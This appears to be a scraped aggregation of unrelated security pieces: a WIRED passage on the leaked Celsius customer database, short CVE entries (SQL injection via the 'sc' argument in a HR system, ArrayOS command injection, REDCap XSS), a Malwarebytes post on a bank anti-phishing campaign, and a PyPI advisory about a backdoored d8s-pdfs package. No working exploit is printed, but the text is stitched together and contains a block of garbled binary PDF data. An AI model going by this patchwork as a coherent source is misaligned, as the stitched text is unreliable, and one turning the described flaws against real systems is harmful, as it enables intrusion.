“You can find someone’s balance, deposits, and withdrawals and then correlate all that to the blockchain,” Bax says. “We can use it for good, but it can absolutely be misused too. Criminals are going through this right now, looking for whoever has the biggest balances.” Once they’re identified, Bax warns, those wealthy crypto holders could be targeted with spear-phishing, scams, and even physical extortion.

Cryptocurrency tracers in law enforcement, government regulators, and private firms are no doubt already following flows of funds to and from Celsius, scouring it for leads in their own research. "This is data we'll ingest, analyze, and have available as part of our investigations, and I suspect others will too," says Matt Edman, cofounder of the security startup Naxo. Edman previously worked as an FBI contractor at the Mitre Corporation, where he helped trace cryptocurrency in the criminal case of Ross Ulbricht, the creator of the Silk Road dark web market.

"When it comes to cryptocurrency tracing, following the flow of funds is not really the hard part," Edman adds. "The tricky part in those investigations is the attribution—associating an address or transaction with an individual. That's where datasets like this are key."

Celsius didn't respond to WIRED's request for comment.

In just the days following Celsius' disclosure of the database in court records, internet sleuths have already begun posting findings from the data. One well-known independent cryptocurrency tracer, who goes by the Twitter handle ZachXBT, posted evidence from the leak that a Celsius user and influencer named Lark Davis had promoted Celsius after pulling his own $2.5 million worth of crypto out of the exchange. (Davis didn't immediately respond to WIRED's request for comment.) The website Celsiusnetworth.com already claims to allow anyone to search the data for individuals' holdings at the exchange.

Meanwhile, a cryptocurrency tracer and developer for decentralized finance firm Viper Labs, who goes by the name Federico Notte, converted the PDF from Celsius' court filing into a spreadsheet and posted a link to his public Twitter account. He tells WIRED he hopes to use the database in combination with blockchain analysis to figure out the transactions of major trading funds, in hopes of learning their tactics. "It's something you can definitely do," says Notte. "It's also a major privacy concern for these people, too."

But even as legitimate analysts and investigators dig into the data, some cryptocurrency tracers emphasize that it will be of far more value to criminals. "The amount of private information is quite scary, really," says Thibaud Madelin, who leads research at cryptocurrency-tracing firm Elliptic. "Scammers will be scouting this list, and they’ll know how much people have spent, how much they’ve lost, how much they hope to make back."

"They’re ruthless," Madelin adds, referring to scammers. "And this will give them thousands of opportunities."

Celsius Exchange Data Dump Is a Gift to Crypto Sleuths—and Thieves

A vulnerability was found in SourceCodester Human Resource Management System. It has been classified as critical. Affected is an unknown function of the file getstatecity.php. The manipulation of the argument sc leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-210714 is the identifier assigned to this vulnerability.

Sorry, something went wrong. Reload?

Sorry, we cannot display this file.

Sorry, this file is invalid so it cannot be displayed.

CVE-2022-3470: POC-Exp/The Human Resource Management System sc parameter is injected.pdf at main · Hanfu-l/POC-Exp

Array Networks AG/vxAG with ArrayOS AG before 9.4.0.469 allows unauthenticated command injection that leads to privilege escalation and control of the system. NOTE: ArrayOS AG 10.x is unaffected.

%PDF-1.7 4 0 obj << /BitsPerComponent 8 /ColorSpace /DeviceGray /Filter /FlateDecode /Height 970 /Length 44247 /Subtype /Image /Type /XObject /Width 3249 >> stream x���q��:��H�$ ���$T���J@� ����ݥt�ff������s�,�͓L&����J\]�\*��E�5���P����Wb�\*\_�+����B\`P��#�@�C$��Qs����F�!X�h��H\`P�� ,j4��B\`P�n�5��b$��Q#�@���˼��4� ,j4��B\`PPs����F�!XԨ��H\`P�� ,j��c$��Q�� ����-&����d}?�Q��4� ,j4ky���O�Q�%�H\`P�ģ" ,ܝ�y%��,�<���H\`P���� ,��<\*����� ,j4��H�!3��6��\]#�@��!X�h����BM#�@��{$��S��Wb@�@�,�E\`P-�j��KUz������Z�"���^\`�P�XbUg�Zu�"���b\`�ФX��,�E\`P-��r�I1�t4XT�D\`P����V�������Z�"���b\`�4XTkG\`P-�j)�6�&�jXTK1�hR,\]M=�@�,��X�4)�>�&�j\]��-��N/���,�E\`P-����H3�����,��4K@�@�����@�b\`�h"���b\`�ФXbM=�@�4K@�f\`i("���Y1�(�K@�@�4�%��V1��XTK3��K����Z������"���M1�(�G�PE\`P��b\`�P�)������Z'���ɑT��R ,�zTG�PE\`P-���ɑTXT�W,��4'G�F���T�^��r�־=tݥ�5��������N��;cu����4����C�ۺ��݇u"�lVӞ.����۵;��Z��'Xkj؜����<���U���ؚ��r��kõ\[��\]5��ڝ��VA�~�e���99���p� s�S��a��P����z,q?W�Т�a99�����,6B�47dX��V��ZyU���a��\]GZA�ʗW�w���~�#틑�܄کu�ɑn�K�����X5�pr$���D)r��T���G��H��C"W��

CVE-2022-42897

A reflected XSS vulnerability exists in REDCap before 12.04.18 in the Alerts & Notifications upload feature. A crafted CSV file will, when uploaded, trigger arbitrary JavaScript code execution.

CVE-2022-42715

Categories: News
Tags: Bank

Tags:  awareness

Tags:  campaign

Tags:  never say that

Tags:  security

Tags:  phish

Tags:  phishing

We take a look at an awareness campaign based around the kind of thing you should never hear your bank saying.



(Read more...)




The post Security awareness campaign highlights things your bank will never say appeared first on Malwarebytes Labs.

If you like anti-phishing efforts, hashtags, and confusing but colourful video games, you’ll be interested to know that a security initiative involving all three is now live. The American Bankers Association and other banks in the US are involved in an awareness campaign tied in with National Cybersecurity Awareness Month.

The campaign focuses on phishing and ways to tackle it head on with the aid of some learning tools and an informative website. It’s called “Banks never ask that," and this is a good place to focus a campaign given the number of times we do indeed say that “banks will never ask you this.” It’s a common bit of security messaging, given a potentially very visible boost. That can only be a good thing, right?

**Scoping out the scams**

The incredibly colourful Banks Never Ask That is a collection of tips focused on four key areas of phishing danger: text messages, mobile payment app scams, email, and phone calls. Each section focuses on advising would-be victims to slow things down and not be rushed into hasty decisions by the scammer. This is a good idea; many phishing attacks plug into a fear of missing out, or time limited offers, and even refunds and panic-inducing situations. This is all in an effort to have someone not think clearly, and hand over logins or payment details in ways which can’t easily be corrected.

Also, a related PDF that claims to offer a “deeper look” into the problem repeats much of the same info from the website's dropdown menus. All the same, it’s still handy to have all of the information in one place as opposed to dropdown categories which are only viewable one at a time.

The rest of the site focuses on specific areas of security related to locking down accounts, using multi-factor authentication, insisting on calling back a bank directly instead of taking a random caller’s word for it and so on.

There’s also one of those pages where you can “spread the word”, in the form of pre-written tweets giving the same advice. I’m not entirely convinced this kind of thing is particularly effective, but the option is there nonetheless.

**Let's all go to the movies**

There is a tendency for people to not read things, and any cybersecurity month runs the risk of overloading folks with information. When everyone is saying to do this, and not do that, over the space of a few weeks, then fatigue will come into play.

With this in mind, there’s a number of videos tied to the campaign which make a lot of the points easier to digest. One focuses on not falling for fake phone calls from your bank, another makes the point that bank staff will never ask for your PIN number. In fact, the videos seem to make the point about what banks don’t ask for more clearly than the various text-laden portions of the site. In conclusion, bonus points for the videos! They’re short, easy to understand, and work like a charm.

**Taking a trip to Scam City**

Finally, we come to the prominently promoted game on the front page called “SCAM CITY.” It’s a very old fashioned side scrolling game where you jump or slide underneath enemies designed to look like the various types of cyberthreats being warned about.

There’s a flying telephone in the form of a landline receiver, which some players probably won’t recognise. We have an angry wallet, which I thought was a brick. There’s something which for all the world looks like a rectangular fried egg, but is supposed to be a…payment app? A mobile phone? A brick covered in egg? I don’t know.

The game works by giving you security tips. Unfortunately, you most often see a tip once you collide with an enemy and then die. It’s also easy to miss the tips as they appear and click right through them. If you manage to survive long enough, you eventually see one additional bonus tip once you gain enough points.

What this means is we have an educational game where you’re only educated if you’re really bad at it, or decide to deliberately run into the enemies. Good players will see one tip and then that’s probably it, until they die and then are graced with a second tip.

From a design perspective, it feels like penalizing the player for doing well is at odds with trying to show them as many fun security tips as possible.

**How to dodge the fakers and phishers**

Despite the fun and breezy nature of this campaign, it is underpinned by some very serious business. As DRG News highlights, the United States Federal Trade Commission (FTC) estimated somewhere in the region of $5.8 billion lost to phishing and related fraud across 2021.

It only takes one mistake to find yourself faced with significant and damaging losses from a phish. As such, maybe a light and playful attempt at having folks think more about what a bank doesn’t ask you for is a smart move. Here’s a few more tips::

*   You won’t be asked for PIN numbers, or secret passwords, or online banking logins by a legitimate bank employee. Someone on the phone will also never ask you for any kind of authentication code, either.
    
*   Bogus refunds and non-existent problems with your account are common tactics. Where genuine issues such as these exist, you’ll almost certainly receive a letter in the post about it first or have an alert in your online banking portal to check out if you’re paperless. As with all of these fake-outs, you should phone the bank directly using a number from the official website.
    
*   Treat email attachments with skepticism, especially in relation to refunds or payment issues. The attachment may direct you to a phishing site, or even attempt some form of malware hijack. If you’re using Microsoft Office products, most if not all forms of enablement required to activate malware via document should be disabled by default. “Read only” mode is best, but not opening the document in the first place is even better.
    
*   Very rarely, scammers will claim that a bank’s site is being updated, or replaced, and moved to a new URL. Should you receive a message along these lines, call your bank and visit the real thing. It’s almost certainly going to be a fake, this isn’t the kind of thing a bank keeps quiet and then suddenly changes with almost zero warning.
    
*   If you’re talking to your bank’s customer support on social media, make sure the account you’re talking to is the one you started with. Scammers create fake bank profiles and attempt to interject in your conversation when the real support channel is out of office.
    

Stay safe out there.

Security awareness campaign highlights things your bank will never say

The d8s-pdfs package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-urls package. The affected version is 0.1.0.

**Project description**

**Democritus Pdfs**

      

Democritus functions\[1\] for working with PDFs.

\[1\] Democritus functions are _simple, effective, modular, well-tested, and well-documented_ Python functions.

We use d8s (pronounced "dee-eights") as an abbreviation for democritus (you can read more about this here).

**Installation**

    pip install d8s-pdfs
    

**Usage**

You import the library like:

from d8s\_pdfs import \*

Once imported, you can use any of the functions listed below.

**Functions**

*   def pdf\_read(pdf\_path: str) \-> Iterable\[str\]:
        """Get the string from the PDF at the given path/URL."""
    

**Development**

👋  If you want to get involved in this project, we have some short, helpful guides below:

*   contribute to this project 🥇
*   test it 🧪
*   lint it 🧹
*   explore it 🔭

If you have any questions or there is anything we did not cover, please raise an issue and we'll be happy to help.

**Credits**

This package was created with Cookiecutter and Floyd Hightower's Python project template.

**Download files**

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

**Source Distribution****Built Distribution**

Tag

#pdf